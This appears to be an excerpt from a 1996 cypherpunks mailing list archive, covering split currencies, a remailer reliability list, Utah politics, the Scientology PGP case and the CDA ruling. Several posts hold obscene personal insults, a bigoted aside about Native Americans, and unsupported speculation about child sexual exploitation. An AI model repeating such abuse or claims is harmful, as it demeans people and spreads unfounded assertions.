This strategy was frequently associated with police state tactics,
lawless imprisonment, and swift execution, for vaguely defined
economic crimes.  It has become substantially less common in
the nineties.

The external currency tended to spread into the internal economy,
despite police state measures to prevent this from happening,
and the internal currency tended to become worthless and could only be
spent while holding a gun to the head of the person accepting 
it.

In countries employing this system, women, and often children
of both sexes, are often cheaply available for sexual purposes
if you have foreign currency.

I speculate that this is because people find that they *must* 
obtain foreign currency, the internal currency being
unspendable, and any method available to them for obtaining foreign
currency is a criminal offense.

A retreat from this system, usually by allowing the international
currency to freely penetrate the internal economy, tends to 
be associated with a substantial reduction in the availability
of young girls, as for example in Cuba recently.

> This scenario is not entirely hypothetical.  I have read that
> Senator Patrick Leahy introduced Senate Bill #307 to create
> such a split currency. 

Why am I not surprised that it was Senator Patrick Leahy of
crypto bill fame?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Mon, 30 Sep 1996 16:13:27 +0800
To: cypherpunks@toad.com
Subject: A periodic alert regarding Tim May
Message-ID: <9609300606.AA23260@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May styles his facial hair to look more like pubic hair.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 1 Oct 1996 02:42:58 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199609301350.GAA15812@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash ksub latent cut ek mix reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 30 Sep 96 6:45:05 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          ************    14:56 100.00%
cyber    alias@alias.cyberpass.net        *****++**+**    33:36  99.96%
dustbin  dustman@athensnet.com            ++-+-++++--   1:11:40  99.94%
winsock  winsock@c2.org                   --------..-+  6:56:13  99.81%
exon     remailer@remailer.nl.com         #*+#*# -#***    12:53  99.79%
extropia remail@miron.vip.best.com        ----.------   7:25:48  99.62%
balls    remailer@huge.cajones.com        ************     5:03  99.40%
haystack haystack@holy.cow.net             #--*##*####    13:56  99.17%
amnesia  amnesia@chardos.connix.com       ----------+   3:47:17  98.46%
middle   middleman@jpunix.com             - - +- - +    1:27:49  95.92%
squirrel mix@squirrel.owl.de              --++++ +++    1:56:13  92.08%
replay   remailer@replay.com              **+******  *     4:11  91.92%
lead     mix@zifi.genetics.utah.edu       + ++*++  .-*  2:49:27  91.01%
mix      mixmaster@remail.obscura.com     ++++-++--+    1:53:37  81.18%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Tue, 1 Oct 1996 01:06:06 +0800
To: cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State
Message-ID: <199609301250.GAA09647@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Sep 96 at 0:55, Moroni wrote:

>       I never cease to be surprised by the interest that gentiles show  in
> working mormon communities while totally neglecting their own failing
> areas.

<rant on>

I never cease to be surprised by Mormon apologists who refuse to look 
in the mirror at problems in so-called "working Mormon communities."  

I moved to Utah 2 years ago from Texas.  Even though I am nominally 
Mormon (I haven't been to Church in years), it was still a huge 
culture shock to me.  I think the thing that bugs me the most is the 
way the political system is dominated by a 500 lb. elephant known as 
the LDS Church.  We Utahns sit in a room with this elephant that eats 
and s**ts and yet we don't talk about the fact that it's there.

This is Utah for you...Utah where during the first legislative
session I was here (1995) the legislature spent 42 out of 45 days
talking about whether they were going to have tightened ethics laws.
 Where during the last legislative session (1996) the legislature
spent 42 of 45 days discussing what to do about the fact that a few
kids in one of the Salt Lake high schools wanted to have a
gay/lesbian/straight club.  NO MATTER that the schools are horribly
overcrowded and that in some elementary grades 40-plus students per
classroom is the norm.  NO MATTER that teachers are horribly
underpaid in a state with California-style costs.  NO MATTER that
despite a $100 million surplus the governor and the legislature
can't see clear to get rid of the sales tax on *food*.  NO MATTER
that if anything terribly controversial (or even not so
controversial)  comes up, someone in the legislature feels like they
have to sound out the Church to make sure that they don't cross 
Gordon B. Hinckley or Boyd K. Packer and endanger their Church 
membership.

In the meantime, our legislators (with Church approval, these are 
Church "callings") run down to the prison at Point of the Mountain to 
"counsel" convicted child abusers and then pass laws to get rid of 
minimum mandatory sentencing.  The roads are falling apart here, the 
schools are overcrowded.  Gang violence is prevalent up and down the 
Wasatch Front.  I heard about a gang-related murder in Layton last 
weekend.  Up until a month ago, when the mayor of Salt Lake City 
closed the place and forced them out, there was a well-known open-air 
drug supermarket going on in Pioneer Park.  Legislative leaders think 
that they're above the Open Meetings law.  And liquor laws still are  
pretty backwards.  (Gee, just last week places that sell beer 
actually got permission to put signs that say "BEER" instead of 
"BEE?" on their premises.)

Thing is, Utah is generally a wonderful place to live.  As I said, I
used to live in Texas.  It's great to live in a place where the
economy is booming and there are jobs available.  The crime rate is
pretty low for an urban community (but there are sore spots, as I
indicated above).  The scenery is downright spectacular.  And Salt
Lake City proper is a pretty cool place.  

But I don't believe that Utah is immune to the problems that beset 
other cities.  One thing that would help is for Utah opinion-makers 
to admit that not everyone who lives in this "pretty, great state" is 
a devout Mormon and/or a Republican.  Not everyone shares the same 
values as the dominant religion, and they shouldn't have to.  

I apologise to the cypherpunks mailing list for this rant, but not 
everyone in Utah agrees with the view expressed by Moroni above.

Deana

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Tue, 1 Oct 1996 01:04:43 +0800
To: cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State
Message-ID: <199609301251.GAA09713@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Sep 96 at 17:36, Ryan Russell/SYBASE wrote:

> Hmm...never heard that one before.  Care to produce
> a reference?
> 
> (Or am I supposed to be ignoring this guy when he
> makes ridiculous claims?)
> 
>     Ryan

I suspect that Dmitri is referring to the Mountain Meadows Massacre.  
It's not a pretty story and is one of the low points of Mormon 
history.

The late historian Juanita Brooks wrote about the masscre, and about 
the leader, John D. Lee, in a couple of books.  

> ---------- Previous Message ----------
> To: cypherpunks
> cc: 
> From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp
> Date: 09/29/96 05:54:09 PM
> Subject: Re: Utah as a Religious Police State
> 
> Ryan Russell/SYBASE writes:
> > I guess that depends on your definition of liberty.  The Mormons
> > originally moved there to have a place to practice their religion,
> > and have freedom from persecution.  I suppose one could extend that
> > to wanting a place to have the freedom to have a set of rules consistant
> > with their beliefs.  Should that include freedom from interferance from
> > folks such as yourself who want to change their rules, even though
> > you're not presently effected?
> 
> It's worth noting that one of Utah mormons favorite pastimes was to ambush
> the settlers heading for California, kill them all, and take their property.
> However the mormons were dealt with much less severely than the local Indians
> who tried the same tricks. Pity.
===end vulis rant===

Deana 



Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 1 Oct 1996 02:52:43 +0800
To: cypherpunks@toad.com
Subject: RE: Looking for Qualified Individual/Firm to Contract for   Cryptanalysis
Message-ID: <199609301400.HAA15466@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



I saw this

> > I am looking for one or more people (or firms) who are qualified to perform
> > world class cryptanalysis work. Please send mail to me at joswald1@msn.com
> > call in the U.S. at +1 408.479.7874
> >
> > Jack Oswald

and then this...

> [from alt.religion.scientology, where net-activist Grady Ward is a subject
> of a lawsuit from the Scientologists...]
> 
> Grady Ward posted updates in his case of alleged copyright and trade
> secret violation. 
> 
> "Word as of September 26, 1996 at 10:00 AM is that the technician who has
> been trying to 'crack' files apparently encrypted using PGP has admitted
> that 'he can make no further progress' after a month of concentrated
> effort. 
> 
> "The disks will remain in a safety deposit box until the 'ho reveals any
> new plans for bringing in cryptography experts to assist in the analysis." 

[the 'ho here is a nasty name for the religions key lawyer, Helena
Kobrin]

The trial is happening in San Jose, and I wouldn't be at all surprised
if the attempted cryptanalysis is happening there, too.  They've been
working at it for a few months now.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 286-3376
   Hammerhead Productions  http://www.got.net/people/thad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <cadams@acucobol.com>
Date: Tue, 1 Oct 1996 02:37:47 +0800
To: "jimbell@pacifier.com>
Subject: Re: Internet plug pulled on Colombia's guerrillas
Message-ID: <199609301422.HAA28798@acucobol.acucobol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996 14:33:42 -0800, jim bell wrote:

>>The Revolutionary Armed Forces of Colombia (FARC), which
>>has periodically paralyzed half the country with road blocks,
>>found its route to the information superhighway barred. 
>>
>>The Communist insurgents, who rose up in arms in 1964,
>>embraced new technology last year in their fight to overthrow the
>>government by launching a home page on the Internet. 
>
>I couldn't resist smiling when I read this.  Not that I want their access 
>cut; quite the opposite.  But it is REALLY reassuring to see the authorities 
>behave in exactly the fashion you expect them to!  Attempting to cut off 
>dissenting political voices IRL is de rigeur; now, this shows that they 
>believe "threat" to the government posed by allowing others to voice 
>contrary opinions on the 'net is real.

It's particularly funny when you consider that the main justification for
suppression is that insurgents (or rebels or freedom fighters or ...) kill
people. Something along the lines of "We don't suppress unpopular views;
we're just protecting our citizens".   Now, it seems to me that that having a
web page is a decidely non-lethal thing. <g>  OTOH, it's probably more
effective at getting the outside world to find out what's happening.  Draw
your own conclusions.

# Chris Adams <cadams@acucobol.com>
# <adamsc@io-online.com> |  http://www.io-online.com/adamsc/adamsc.htp






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 1 Oct 1996 03:11:07 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <Pine.LNX.3.95.960930005217.19145A-100000@user1.scranton.com>
Message-ID: <324FD588.3FF2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


On the below: Gentiles (and Jews) are *very* afraid of Mormons.  Maybe 
it has something to do with the World's Largest Database (on non-Mormons 
especially) they keep under that mountain near SLC Utah.

Moroni wrote:
> I never cease to be surprised by the interest that gentiles show  in
> working mormon communities while totally neglecting their own failing
> areas.

> On Sun, 29 Sep 1996, Timothy C. May wrote:
> > (I received this message, with "cypherpunks@sybase.com" as well as
> > "tcmay@sybase.com" (???) cc:ed, so I assume this message was intended for
> > the Cypherpunks list, with some sybase domain name weirdness, or reflector,
> > going on.)

> > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
> > >I guess that depends on your definition of liberty.  The Mormons
> > >originally moved there to have a place to practice their religion,
> > >and have freedom from persecution.  I suppose one could extend that
> > >to wanting a place to have the freedom to have a set of rules consistant
> > >with their beliefs.  Should that include freedom from interferance from
> > >folks such as yourself who want to change their rules, even though
> > >you're not presently effected?
> >
> > Well, if Utah can rig a way to _secede_ from the Union, your arguments
> > would make more sense. But so long as they are part of these United States,
> > their religious beliefs about when children should be at home cannot
> > supersede basic liberties.

[additional text deleted]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 30 Sep 1996 16:34:52 +0800
To: cypherpunks@toad.com
Subject: crypto cd
Message-ID: <9609300624.AA07020@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Sep 30 07:21:49 1996
Still looking for material...

especially:

sci.crypt archives          (10.1994 until now... Mark Riordan???)
sci.crypt.research archives (all)
other releavant news groups

has anybody anybody got anything?

remo


- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.rpini.com/crypto/crypto.html

iQEVAwUBMk9Y7hFhy5sz+bTpAQHz3wf/VD175Mf8ShQ0drqvwH4m5Yf7N9iE0ZeG
V5Nv80Um3ofnhZvFscgijgPf54+25a8ogWJcEB3k+SEROvkeQkA49QmEYPIlotYi
2U6+xb5bgjQ5NvRMe09o+3cBSd7y3HabWpNPBtCX4cLxKWm3DOw+xOa+CWf8Kmuu
nuaFaJhKG1RYkr/3QNPFlDSbh7PPi1Rg7go0LdVMkQUzMgWizkAOJJlg0cl5ZdVE
ZV6JdiQD6o9JBWKEOX1Y4mqxQ9tRRDagfADa3S8wPOpT3WxWKVgKgbjLtvUsXrgZ
miokoDGNSs2Cxlw+wk9kxKAbRrsCfoEAAPygvCHEDp0WGxA445iRZA==
=NT66
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 30 Sep 1996 22:36:37 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: (Firewalls) Where is that Snake Oil FAQ again?
Message-ID: <199609301247.HAA17135@homeport.org>
MIME-Version: 1.0
Content-Type: text


This may of course, just be a troll.

----- Forwarded message from Anonymous -----

>From firewalls-owner@GreatCircle.COM  Sun Sep 29 21:27:09 1996
Date: Mon, 30 Sep 1996 02:37:26 +0200 (MET DST)
Message-Id: <199609300037.CAA20690@basement.replay.com>
Subject: New Release - Software OTP Encryption.
Content-Type: TEXT/PLAIN; charset=US-ASCII
To: firewalls@GreatCircle.COM
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
XComm: Replay may or may not approve of the content of this posting
XComm: Report misuse of this automated service to <abuse@replay.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


         I apologize for this intrusion into your affairs. Please
         forgive but we do have important information that will be of
         interest to Internet users.

         Would you like to secure your hard disk files against
         compromise by Internet Interlopers? Would you like to
         communicate over Internet in absolute privacy? We can provide
         you with the tools necessary to do those two things in an
         absolute sense.

         Briefly, we have developed the first software sourced OTP,
         which is provably as good as any hardware sourced OTP that
         can possibly be be generated. Most experts thought that this
         could not be done, but we have done it, and can prove it.

         Our prices are:

         - $95.00  for a complete dual user system,  the full package
                   for two users, but your communications are limited
                   to that single user -

         - $95.00  for a complete Elita unlimited usage system - that
                   is you can protect your internal files, and
                   communicate with anyone else that has an Elita
                   system, or more comprehensive Ultima system below.

         - $195.00 for a complete Ultima Internet/intranets system,
                   this allows user to protect their own files -
                   communicate with anyone that has an Ultima, or an
                   Elita, system - to form hierarchal work groups that
                   provide the same protection - and to customize
                   their system variables to achieve the maximum
                   entropy.

         We are also going to open up the whole company for outside
         participation - it is going to a completely open Internet
         Distributive Company, we believe the first one of its kind.
         Anyone is welcome to participate in the venture.  All
         marketing is to be done on an lucrative MLM basis, program
         development will be done on a royalty/commission on adjusted
         gross income basis.  Everyone that participates will share in
         the rewards.  System testing will also be handle in a similar
         manner, and system engineering will be handled on a fee for
         services and participation basis. If you can perform, you can
         win big, really big. If you just try to perform, you will
         still win.

         This is an important opportunity for you, take advantage of it
         at this most opportune time, To order, call us at 817-691-
         1081, or write to us at 2629 Plaza Parkway, Suite B-20,
         Wichita Falls, Texas, or order through Internet 
         
         or e-mail us at:  ipgsales@netprivacy.com.

         For more details, visit our web site at:

               http://www.netprivacy.com

         Our apologies again, but we believe it to be important.

Appreciatively,

Don Wood, IPG

"None can be so true to your secret as yourself."

                                             - Sa'Di




----- End of forwarded message from Anonymous -----

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 1 Oct 1996 09:16:55 +0800
To: cypherpunks@toad.com
Subject: FRC's Cathy Cleaver bashes CDA ruling, online "anarchy"
Message-ID: <Pine.GSO.3.95.960930075029.3684D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 30 Sep 1996 07:49:55 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: FRC's Cathy Cleaver bashes CDA ruling, online "anarchy"

This is a wonderful article by the Family Research Council's Cathy
Cleaver. Her stategy: Rant about porn, rant about children. But ignore
that the Internet is not radio or television so different standards
should apply. And ignore that another three-judge panel in NYC came to
similar conclusions as the Philly ones did.

Obviously, the largely Bush- and Reagan-appointed Federal judiciary
has been brainwashed by computer geeks. Or perhaps the judges, unlike
Ms. Cleaver, actually logged on once or twice.

-Declan

************

http://www.frc.org/townhall/FRC/perspective/pv96i3pn.html

CYBERCHAOS: NOT FIRST AMENDMENT'S PROMISE
                  
   by Cathleen A. Cleaver, Esq.
   
   The Department of Justice has announced that it will appeal to the
   Supreme Court the recent Philadelphia federal court's ruling against
   the Communications Decency Act. That appeal is the right thing to do,
   and here's why.
                          
   Not long ago I debated Bob Guccioni, publisher of Penthouse, on the
   merits of restricting computer pornography and the Philadelphia
   ruling. Not surprisingly, he was elated by the three-judge panel's 
   decision to strike the indecency provisions, the effect of which was
   to give a computer pornographer more "free speech" rights than any
   other speaker in any other forum. For the first time in the history of
   our country, a porn purveyor may intentionally show sexually explicit
   pictures to a child without legal jeopardy -- provided the purveyor
   uses the Internet. First in line to challenge the CDA was, of course,
   the ACLU and its cyberclones, followed by CompuServe, America Online,
   and others with a huge financial stake in the unenforceability of the
   CDA, like Playboy and Penthouse. Guccioni may finally claim the
   consumer market share which he has heretofore been denied.
          
   Not only did the Philadelphia panel strike provisions prohibiting
   adults from posting sexually explicit materials in public areas of the
   Internet that children frequent -- like teen chat rooms -- but it also
   struck the prohibition on e-mailing a Penthouse centerfold (or the
   like) directly to a specific child who is known by the sender to be a
   child. In the words of the Department of Justice: "Never before in the
   history of telecommunications media in the United States has so much
   indecent (and obscene) material been so easily accessible by so many
   minors in so many American homes with so few restrictions."
          
   To say the ruling is flawed is a double understatement. Not only is
   the decision based on legal theories directly contrary to Supreme
   Court precedent and incorrect assumptions about the capabilities of
   Internet technology, but it is less a ruling than a trio of separate
   opinions. Each judge took his turn chiding Congress for daring to
   inhibit the liberty of cyberspace pioneers, however ruthless, in the
   interest of children and the greater cybercommunity. Highlights from
   the lengthy trilogy include conclusions that it is "either
   technologically impossible or economically prohibitive" to comply with
   the CDA, that the term 'indecent' is altogether too vague, and that,
   "just as the strength of the Internet is chaos, so the strength of our
   liberty depends upon the chaos and cacophony of unfettered speech."
   These conclusions defy fact, law, and logic, respectively.
          
   Given that some on-line pornographers currently screen and restrict
   children from their sites, it cannot be said that compliance is
   impossible. Moreover, new technology is being developed at dizzying
   speed to address a variety of Internet challenges, such as consumer
   transaction security and the protection of property rights of amateur
   musicians who exchange their songs, making it all the more evident
   that it is really lack of will and not ability which makes Internet
   advocates cry "foul." As to expense, this callous court complains
   about the economic burden the CDA would impose on distributors of 
   pornography, while finding it good and proper for parents alone to  
   incur the costs, however great, of protecting their children. Outside
   the sacred realm of cyberspace, distributors of pornography routinely
   incur expenses to shield children. To cite just one example, "blinder
   racks" must be purchased and installed at newsstands so that children
   do not see offensive sex magazine covers. This economic burden flows
   directly from the legal responsibility these distributors bear to  
   shield this material from minors. Software blocking programs, on the
   other hand, are initially expensive for parents, need frequent    
   updating (at considerable expense), are easily circumvented by        
   computer-savvy kids, and are simply incapable of screening much of the
   pornography. Surfwatch, the leading software blocker, admitted in the
   CDA hearing to missing up to 800 sexually explicit sites each month! 
   
   Moreover, it goes without saying that a software blocking program can
   only work on a family's home computer where it is installed. What
   happens when the kids go next door or, for that matter, to the public
   library? The American Library Association proclaimed in the
   Philadelphia court that, as a matter of solemn principle, it will
   never employ software screening programs in its libraries' computers  
   -- not even when children use them. This to-hell-with-children        
   sentiment is reflected by the judges and echoes throughout their  
   opinions.
   
   Chief Judge Sloviter's opinion even concludes that for "content     
   providers . . . to review all of their material" to determine       
   which of it is sexually explicit is surely "a burden one should not
   have to bear." What? The content provider is in the best position
   to determine whether his material contains patently offensive      
   depictions of sexual or excretory activities, and that is why our laws
   have always required him to do just that. The allocation of this   
   burden to the speaker, as opposed to the consumer of the speech, not
   only carries the weight of unanimous legal precedent, but also has the
   benefit of being practical. It is virtually a truism to say that, as
   between speaker and consumer, the speaker is in the better position to
   know the content of his speech. Judge Sloviter would remove a
   reasonable burden from content providers and replace it with the      
   enormous and nearly impossible burden on parents to first locate, then
   evaluate, and then block pornographic material in an effort to protect
   their children. 
   
   Their quarrel with the indecency standard reveals that the judges are
   either ill-informed or ill-intentioned. An indecent communication is
   one "that, in context, depicts or describes, in terms patently 
   offensive as measured by contemporary community standards, sexual or
   excretory activities or organs." This definition has been consistently
   upheld in every case in which it has been reviewed, including at the 
   Supreme Court, which, most recently in the cable pornography case of
   Denver Area Educational Telecommunications Consortium, Inc. v. FCC,
   held the standard to be "not impermissibly vague." As if to justify
   their awkward conclusion, the court lists as examples of "threatened"
   speech material which simply could not fall within the definition of
   indecency, such as discussions of recent movies or ancient Indian    
   statues or articles about human rights violations. To serve their end,
   the judges conveniently, but not subtly, ignore the requirement that 
   the materials be evaluated "in context." No court has ever construed 
   this standard to encompass, without any consideration of context, all
   material of literary or artistic value that is somehow related to  
   sexuality.
   
   Not to be topped, Judge Dalzell proclaims: "Any content-based         
   regulation of the Internet, no matter how benign the purpose, could   
   burn the global village to roast the pig." Really? What about fraud --
   may we not protect consumers in cyberspace? May we not ban child     
   pornography or enforce copyright violations on-line? Would these
   content-based regulations burn the village, too? 
   
   If the First Amendment's promise to this new technology is indeed    
   chaos and anarchy, then perhaps Judge Dalzell is right. But before we
   too quickly agree with this visionary from the federal bench, we ought
   to ask ourselves how we have survived and thrived as a democracy for  
   two centuries upon the bedrock of ordered liberty, the enemy of chaos 
   and anarchy. 
            
   The Supreme Court ought to roundly denounce this federal panel's
   decision. To affirm it would be to rob our children of the opportunity
   to participate in this great new communications medium, or worse, to
   sacrifice them to perversions and excesses for the convenience and 
   pleasure of the worst malefactors on-line -- in effect, to preserve
   the pornographers' new found sanctuary known as cyberspace.        
   
   -- 9/9/96
   
   Cathleen A. Cleaver, Esq. is Director of Legal Studies at the Family  
   Research Council, a Washington, D.C.-based research and educational
   organization. Miss Cleaver has extensive experience in pornography    
   litigation and legislation.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 1 Oct 1996 01:20:36 +0800
To: cypherpunks@toad.com
Subject: [SPAM] Another "petard" from Timmy "peteur" May and his young friends
In-Reply-To: <199609300441.AA10704@crl12.crl.com>
Message-ID: <gqH3uD93w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May has no life.

>From: Troy Varange <varange@crl.com>
>Message-Id: <199609300441.AA10704@crl12.crl.com>
>Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock
>To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Date: Sun, 29 Sep 1996 21:41:42 -0700 (PDT)
>In-Reply-To: <LJV2uD91w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 11:58:09 pm
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 5298
>
>Vulis sucks Timmy's boyfriend's cock.
>>
>> Timmy May has no life.
>>
>> >From: Troy Varange <varange@crl.com>
>> >Message-Id: <199609300332.AA09870@crl12.crl.com>
>> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
>> >In-Reply-To: <ueP2uD86w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
>> >X-Mailer: ELM [version 2.4 PL23]
>> >Mime-Version: 1.0
>> >Content-Type: text/plain; charset=US-ASCII
>> >Content-Transfer-Encoding: 7bit
>> >Content-Length: 4378
>> >
>> >>                    berserk
>> >> Timmy May has gone        . Has he been eating speed?
>> >>                    bananas
>> >>
>> >> >From: Troy Varange <varange@crl.com>
>> >> >Message-Id: <199609300138.AA08482@crl12.crl.com>
>> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
